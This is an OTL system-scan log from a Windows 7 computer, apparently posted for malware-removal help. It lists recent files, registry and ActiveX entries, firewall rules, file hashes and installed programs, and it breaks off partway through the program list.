ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\System32\ie4uinit.exe -UserConfig

ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install

ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding

ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts

ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help

ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface

ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP

Drivers32: msacm.l3acm - C:\Windows\System32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)

Drivers32: vidc.cvid - C:\Windows\System32\iccvid.dll (Radius Inc.)

========== Files/Folders - Created Within 30 Days ==========

[2013/11/30 11:23:22 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

[2013/11/23 11:05:22 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp

[2013/11/17 13:08:42 | 000,000,000 | ---D | C] -- C:\AdwCleaner

[2013/11/17 11:13:19 | 000,000,000 | ---D | C] -- C:\Users\2011\Desktop\gmer

[2013/11/13 00:34:31 | 002,706,432 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mshtml.tlb

[2013/11/13 00:34:30 | 002,877,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jscript9.dll

[2013/11/13 00:34:29 | 000,391,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieui.dll

[2013/11/13 00:34:29 | 000,061,440 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iesetup.dll

[2013/11/13 00:34:29 | 000,039,424 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jsproxy.dll

[2013/11/13 00:34:28 | 000,493,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msfeeds.dll

[2013/11/13 00:34:27 | 000,109,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iesysprep.dll

[2013/11/13 00:34:27 | 000,071,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\RegisterIEPKEYs.exe

[2013/11/13 00:34:27 | 000,042,496 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ie4uinit.exe

[2013/11/13 00:34:27 | 000,033,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iernonce.dll

[2013/11/12 23:25:21 | 001,796,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\authui.dll

[2013/11/12 23:25:21 | 000,152,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\SmartcardCredentialProvider.dll

[2013/11/12 23:25:15 | 000,220,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ncrypt.dll

[2013/11/12 23:25:14 | 000,015,872 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\sspisrv.dll

[2013/11/12 23:25:10 | 000,216,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\FWPUCLNT.DLL

[2013/11/12 23:25:09 | 000,656,896 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\nshwfp.dll

[2013/11/08 22:37:09 | 000,403,440 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswsp.sys

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2013/11/30 11:23:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

[2013/11/30 11:21:01 | 000,001,048 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job

[2013/11/30 11:20:48 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat

[2013/11/30 11:20:43 | 1608,970,240 | -HS- | M] () -- C:\hiberfil.sys

[2013/11/30 00:58:00 | 000,001,052 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job

[2013/11/30 00:50:00 | 000,001,074 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1065731957-2128596916-2441434026-1000UA.job

[2013/11/29 22:24:42 | 000,017,744 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

[2013/11/29 22:24:42 | 000,017,744 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

[2013/11/24 20:50:00 | 000,001,022 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1065731957-2128596916-2441434026-1000Core.job

[2013/11/22 22:38:34 | 000,663,606 | ---- | M] () -- C:\Windows\System32\prfh0416.dat

[2013/11/22 22:38:34 | 000,615,810 | ---- | M] () -- C:\Windows\System32\perfh009.dat

[2013/11/22 22:38:34 | 000,127,896 | ---- | M] () -- C:\Windows\System32\prfc0416.dat

[2013/11/22 22:38:34 | 000,106,190 | ---- | M] () -- C:\Windows\System32\perfc009.dat

[2013/11/08 22:37:09 | 000,403,440 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswsp.sys

[2013/11/08 22:36:37 | 000,057,672 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswTdi.sys

[2013/11/08 22:36:36 | 000,774,392 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswSnx.sys

[2013/11/08 22:36:36 | 000,070,384 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswMonFlt.sys

[2013/11/08 22:36:36 | 000,035,656 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswFsBlk.sys

[2013/11/08 22:36:35 | 000,269,216 | ---- | M] (AVAST Software) -- C:\Windows\System32\aswBoot.exe

[2013/11/08 22:36:35 | 000,043,152 | ---- | M] (AVAST Software) -- C:\Windows\avastSS.scr

[2013/11/07 12:39:27 | 000,000,902 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

========== Files Created - No Company Name ==========

[2013/08/26 13:12:10 | 000,000,004 | ---- | C] () -- C:\ProgramData\98

[2013/08/03 16:37:56 | 000,002,006 | -H-- | C] () -- C:\ProgramData\ppctrl.dat

[2013/08/03 16:37:55 | 000,000,004 | ---- | C] () -- C:\ProgramData\99

[2013/08/03 16:37:47 | 000,000,000 | ---- | C] () -- C:\ProgramData\0

[2013/03/03 22:17:49 | 000,178,304 | ---- | C] () -- C:\Windows\System32\drivers\aswVmm.sys

[2013/03/03 22:17:48 | 000,049,944 | ---- | C] () -- C:\Windows\System32\drivers\aswRvrt.sys

[2013/02/10 01:00:51 | 000,109,256 | ---- | C] () -- C:\Windows\System32\EasyHook64.dll

[2013/02/10 01:00:51 | 000,090,824 | ---- | C] () -- C:\Windows\System32\EasyHook32.dll

[2013/01/07 19:58:22 | 000,000,871 | ---- | C] () -- C:\Windows\QIII.INI

[2012/10/12 22:39:15 | 000,004,096 | -H-- | C] () -- C:\Users\2011\AppData\Local\keyfile3.drm

[2012/09/09 20:09:22 | 000,000,766 | ---- | C] () -- C:\Windows\ODBC.INI

[2012/08/25 15:28:41 | 000,026,624 | ---- | C] () -- C:\Windows\System32\ssb6mlm.dll

[2012/08/13 00:42:51 | 000,007,607 | ---- | C] () -- C:\Users\2011\AppData\Local\Resmon.ResmonCfg

[2012/08/12 21:56:40 | 000,178,688 | ---- | C] () -- C:\Windows\System32\unrar.dll

[2012/08/07 23:04:07 | 000,077,824 | ---- | C] () -- C:\Windows\KMService.exe

[2012/08/07 23:04:07 | 000,008,192 | ---- | C] () -- C:\Windows\System32\srvany.exe

[2012/08/07 22:52:48 | 000,080,896 | ---- | C] () -- C:\Windows\System32\RDVGHelper.exe

[2012/08/07 22:50:48 | 000,066,048 | ---- | C] () -- C:\Windows\System32\PrintBrmUi.exe

========== ZeroAccess Check ==========

[2009/07/14 02:42:31 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

"" = %SystemRoot%\system32\shell32.dll -- [2013/07/25 23:55:59 | 012,872,704 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]

"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 10:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

"" = %systemroot%\system32\wbem\wbemess.dll -- [2009/07/13 23:16:17 | 000,342,528 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Both

========== LOP Check ==========

[2013/10/21 22:33:44 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\AVAST Software

[2012/08/12 21:47:52 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\BSplayer

[2012/09/09 16:52:57 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\BSplayer Pro

[2012/12/22 13:00:05 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\Canneverbe Limited

[2013/06/07 19:30:38 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\DAEMON Tools Lite

[2013/05/25 20:21:10 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\EQATEC Analytics

[2012/12/19 19:47:24 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\Foxit Software

[2013/06/27 20:35:06 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\PotPlayerMini

[2013/10/13 16:20:40 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\uTorrent

[2012/09/01 22:54:53 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\Youtube Downloader HD

[2012/09/01 22:28:57 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\Youtube to MP3 Converter

========== Purity Check ==========

========== Custom Scans ==========

< MD5 for: ATAPI.SYS >

[2009/07/13 23:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\System32\drivers\atapi.sys

[2009/07/13 23:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_x86_neutral_a5025d31bee4647c\atapi.sys

[2009/07/13 23:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_x86_neutral_fab873f3e8a3315c\atapi.sys

[2009/07/13 23:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.1.7600.16385_none_dd0e7e3d82dd640d\atapi.sys

[2009/07/13 23:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.1.7601.17514_none_df3f92057fcbe7a7\atapi.sys

[2009/07/13 23:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.1.7601.18231_none_df26d4d57fdef5b0\atapi.sys

[2009/07/13 23:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.1.7601.22414_none_dfc9143c98e9a6c4\atapi.sys

< MD5 for: CNGAUDIT.DLL >

[2009/07/13 23:15:06 | 000,012,288 | ---- | M] (Microsoft Corporation) MD5=50BA656134F78AF64E4DD3C8B6FEFD7E -- C:\Windows\System32\cngaudit.dll

[2009/07/13 23:15:06 | 000,012,288 | ---- | M] (Microsoft Corporation) MD5=50BA656134F78AF64E4DD3C8B6FEFD7E -- C:\Windows\winsxs\x86_microsoft-windows-cngaudit-dll_31bf3856ad364e35_6.1.7600.16385_none_e83a414890e8132b\cngaudit.dll

< MD5 for: NETLOGON.DLL >

[2010/11/20 10:20:28 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=C1809B9907ADEDAF16F50C894100883B -- C:\Windows\System32\netlogon.dll

[2010/11/20 10:20:28 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=C1809B9907ADEDAF16F50C894100883B -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.1.7601.17514_none_ffbf212e963c0162\netlogon.dll

[2009/07/13 23:16:02 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=EAA75D9000B71F10EEC04D2AE6C60E81 -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.1.7600.16385_none_fd8e0d66994d7dc8\netlogon.dll

< MD5 for: NVSTOR.SYS >

[2011/03/11 03:39:00 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=4380E59A170D88C4F1022EFF6719A8A4 -- C:\Windows\System32\drivers\nvstor.sys

[2011/03/11 03:39:00 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=4380E59A170D88C4F1022EFF6719A8A4 -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_x86_neutral_0276fc3b3ea60d41\nvstor.sys

[2011/03/11 03:39:00 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=4380E59A170D88C4F1022EFF6719A8A4 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7601.17577_none_3ba44e691d6eb11d\nvstor.sys

[2011/03/11 03:44:01 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=4520B63899E867F354EE012D34E11536 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7600.16778_none_39bef1ad20475e88\nvstor.sys

[2011/03/11 03:28:10 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=66D468654A58594F5F3BA63D5AD5B1AF -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7601.21680_none_3c1c1942369abb77\nvstor.sys

[2011/03/11 03:52:25 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=8A7583A3B58D3EEB28BB26626526BC91 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7600.20921_none_3a779df43942be63\nvstor.sys

[2010/11/20 10:30:06 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=9283C58EBAA2618F93482EB5DABCEC82 -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_x86_neutral_dd659ed032d28a14\nvstor.sys

[2010/11/20 10:30:06 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=9283C58EBAA2618F93482EB5DABCEC82 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7601.17514_none_3be22d131d40bd72\nvstor.sys

[2009/07/13 23:20:44 | 000,142,416 | ---- | M] (NVIDIA Corporation) MD5=C99F251A5DE63C6F129CF71933ACED0F -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7600.16385_none_39b1194b205239d8\nvstor.sys

< MD5 for: SCECLI.DLL >

[2009/07/13 23:16:13 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=26073302DAEA83CC5B944C546D6B47D2 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7600.16385_none_37e4387f3a6f0483\scecli.dll

[2010/11/20 10:21:04 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=8124944EC89D6A1815E4E53F5B96AAF4 -- C:\Windows\System32\scecli.dll

[2010/11/20 10:21:04 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=8124944EC89D6A1815E4E53F5B96AAF4 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7601.17514_none_3a154c47375d881d\scecli.dll

========== Alternate Data Streams ==========

@Alternate Data Stream - 128 bytes -> C:\ProgramData\TEMP:56E2E879

< End of report >

OTL Extras logfile created on: 30/11/2013 11:25:47 - Run 1

OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\2011\Desktop

Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation

Internet Explorer (Version = 9.10.9200.16736)

Locale: 00000416 | Country: Brasil | Language: PTB | Date Format: dd/MM/yyyy

2,00 Gb Total Physical Memory | 1,51 Gb Available Physical Memory | 75,56% Memory free

4,00 Gb Paging File | 3,35 Gb Available in Paging File | 83,81% Paging File free

Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files

Drive C: | 232,73 Gb Total Space | 106,05 Gb Free Space | 45,57% Space Free | Partition Type: NTFS

Computer Name: 2011_PC | User Name: 2011 | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: All users

Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Extra Registry (SafeList) ==========

========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]

.cpl [@ = cplfile] -- C:\Windows\System32\control.exe (Microsoft Corporation)

.hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)

========== Shell Spawning ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]

batfile [open] -- "%1" %*

cmdfile [open] -- "%1" %*

comfile [open] -- "%1" %*

cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)

exefile [open] -- "%1" %*

helpfile [open] -- Reg Error: Key error.

hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)

htmlfile [edit] -- "C:\Program Files\Microsoft Office\Office14\msohtmed.exe" %1 (Microsoft Corporation)

htmlfile [print] -- "C:\Program Files\Microsoft Office\Office14\msohtmed.exe" /p %1 (Microsoft Corporation)

inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)

piffile [open] -- "%1" %*

regfile [merge] -- Reg Error: Key error.

scrfile [config] -- "%1"

scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l

scrfile [open] -- "%1" /S

txtfile [edit] -- Reg Error: Key error.

Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1

Directory [AddToPlaylistVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)

Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)

Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Directory [PlayWithVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)

Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Folder [explore] -- Reg Error: Value error.

Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

"cval" = 1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]

"VistaSp1" = Reg Error: Unknown registry data type -- File not found

"AntiVirusOverride" = 0

"AntiSpywareOverride" = 0

"FirewallOverride" = 0

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]

========== Firewall Settings ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]

"DisableNotifications" = 0

"EnableFirewall" = 1

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]

"DisableNotifications" = 0

"EnableFirewall" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]

"DisableNotifications" = 0

"EnableFirewall" = 0

========== Authorized Applications List ==========

========== Vista Active Open Ports Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]

"{14BED516-BC10-4734-8EAE-D7CE7270E2C4}" = rport=137 | protocol=17 | dir=out | app=system |

"{17D0D93D-C0D5-4DE3-A0EE-983D67DD0EED}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |

"{180A5BBC-A540-46CC-873B-72AB2903C6C8}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |

"{3933B4D4-774D-44AD-9BC5-F27CB68D704A}" = rport=139 | protocol=6 | dir=out | app=system |

"{40B0A3B1-08D6-4695-85CE-EFD9ADECE922}" = lport=137 | protocol=17 | dir=in | app=system |

"{53DEEA35-4063-4FBE-968D-7C627C52590E}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |

"{59B7BA7C-1FA2-4C2B-9059-1B0F9835A995}" = rport=445 | protocol=6 | dir=out | app=system |

"{5B59BFA3-FBFD-4320-AFD9-06195BD9CF8E}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |

"{5B725C46-1BB0-4CBB-AF73-52A8524BD930}" = rport=138 | protocol=17 | dir=out | app=system |

"{7527B37C-A7C7-4F3D-A777-F686AC23BFD3}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |

"{7B28DD59-42E4-4CA5-8D87-98D70188BB09}" = lport=10243 | protocol=6 | dir=in | app=system |

"{8C50DF56-B77D-41AA-8CE3-0B280CC6C894}" = lport=139 | protocol=6 | dir=in | app=system |

"{987BC7DA-97B8-4170-9DCD-F0B53A436554}" = lport=138 | protocol=17 | dir=in | app=system |

"{9DDAA64A-050C-4062-AADA-79C4C74BE31E}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |

"{A93786B6-E9FA-4ACB-B558-72E09BDA3E16}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |

"{B07AD1EE-5199-4846-870C-F69889FBBAE6}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |

"{B9295777-935E-4000-B43A-977E539BAD21}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |

"{C2EA7D92-44D4-43F2-A6EB-976AA8EC840D}" = lport=445 | protocol=6 | dir=in | app=system |

"{C6B6FF42-1FF5-4934-87BD-D4279978FC9B}" = rport=10243 | protocol=6 | dir=out | app=system |

"{DFAED4FA-311B-48D0-ACBF-150E24D52FC0}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |

"{E83ECF93-3755-490B-89BB-5FCDBD3679EA}" = lport=2869 | protocol=6 | dir=in | app=system |

"{EF8520FE-2B0C-4405-80C9-36353057B069}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |

"{F7CC8057-B3D5-4B02-A791-284CEAEC854E}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |

========== Vista Active Application Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]

"{00E6F382-850C-4A66-9FAB-CA120D501D14}" = protocol=6 | dir=in | app=c:\program files\microsoft office\office14\groove.exe |

"{261EF63F-DEF3-4E9D-93BA-1F72EEA4A2C8}" = protocol=6 | dir=out | app=system |

"{2A3D7EE0-5FBB-4306-A189-B1A28D318C06}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |

"{2A8AF078-CCE3-4836-9039-1321F8725C88}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |

"{440EB4E4-C8CD-4D8D-BBAE-C90CC6ADD26B}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |

"{4D0734A3-5826-482F-A05C-ED1498848A93}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |

"{64CBE226-CF2F-45CA-84E0-1EFE3AA727F2}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |

"{65C5FBB5-8EDF-45EA-8C78-EE97DFA2FAA3}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |

"{66A66E8D-C9D8-4D34-B376-22293E975790}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |

"{769E5D5B-2713-4D9A-9E06-D8C980DABB67}" = protocol=6 | dir=in | app=c:\program files\utorrent\utorrent.exe |

"{97639BCD-1327-46F3-9D52-946BC7B4229A}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |

"{9BE762C3-A0BD-434F-8384-071F49655AA2}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |

"{A2E7F4DF-FA6A-4FA4-B510-92890DD31994}" = protocol=6 | dir=in | app=c:\program files\winamp\winamp.exe |

"{A8929234-A172-43B4-8D21-5BAB13B52A91}" = dir=in | app=c:\program files\skype\phone\skype.exe |

"{A9A39500-2614-4539-A99C-FC7787FE743D}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |

"{B66239F9-A8A8-40D7-AC1F-CD1490B90E62}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |

"{C6EB93AF-71EB-4BD2-AAEB-718F5FD4111E}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |

"{C8F41095-EED2-4B5E-97AB-78339B7A94AE}" = protocol=17 | dir=in | app=c:\program files\microsoft office\office14\groove.exe |

"{CA8F3AB9-7BD6-48C6-8F41-AE7D1CA4E66A}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |

"{CD1231C0-C178-43B3-B1FD-223A91B10B62}" = protocol=17 | dir=in | app=c:\program files\winamp\winamp.exe |

"{DB0D8EA1-13C7-4C0A-A472-60DC4FD0A254}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |

"{DDBDECE7-B1F7-4BA5-AC59-974A057CB840}" = protocol=17 | dir=in | app=c:\program files\utorrent\utorrent.exe |

"{F2559E29-3E56-4EDD-B186-F1A566579638}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |

========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

"{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}" = PDFCreator

"{1111706F-666A-4037-7777-211328764D10}" = JavaFX 2.1.1

"{18455581-E099-4BA8-BC6B-F34B2F06600C}" = Google Toolbar for Internet Explorer

"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148

"{2318C2B1-4965-11d4-9B18-009027A5CD4F}" = Google Toolbar for Internet Explorer

"{26A24AE4-039D-4CA4-87B4-2F83216030FF}" = Java 6 Update 30

"{26A24AE4-039D-4CA4-87B4-2F83217040FF}" = Java 7 Update 45

"{3C3901C5-3455-3E0A-A214-0B093A5070A6}" = Microsoft .NET Framework 4 Client Profile

"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater

"{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}" = Skype™ 6.6

"{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}" = Windows Media Player Firefox Plugin

"{7E265513-8CDA-4631-B696-F40D983F3B07}_is1" = CDBurnerXP

"{90140000-0011-0000-0000-0000000FF1CE}" = Microsoft Office Professional Plus 2010

"{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{047B0968-E622-4FAA-9B4B-121FA109EDDE}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2010

"{90140000-0015-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

"{90140000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2010

"{90140000-0016-0409-0000-0000000FF1CE}_Office14.PROPLUS_{6BD185A0-E67F-4F77-8BCD-E34EA6AE76DF}" = Microsoft Office 2010 Service Pack 1 (SP1)

